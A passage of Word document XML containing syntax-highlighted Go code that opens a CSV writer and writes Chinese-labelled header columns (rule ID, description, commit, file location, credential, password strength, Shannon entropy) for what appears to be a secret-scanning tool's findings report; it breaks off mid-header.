          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Finding</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">w </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WriteCloser</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">error </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if len</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(f) == </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>return nil</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">defer </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>w.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">cw := </w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>csv</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NewWriter</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(w)</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>err := cw.</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>([]</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>规则</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>描述</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"Commit"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件位置</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>凭证</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码强度</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>香农熵</w:t>
      </w:r>
      <w:r w:rsidRPr="009800D6">
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
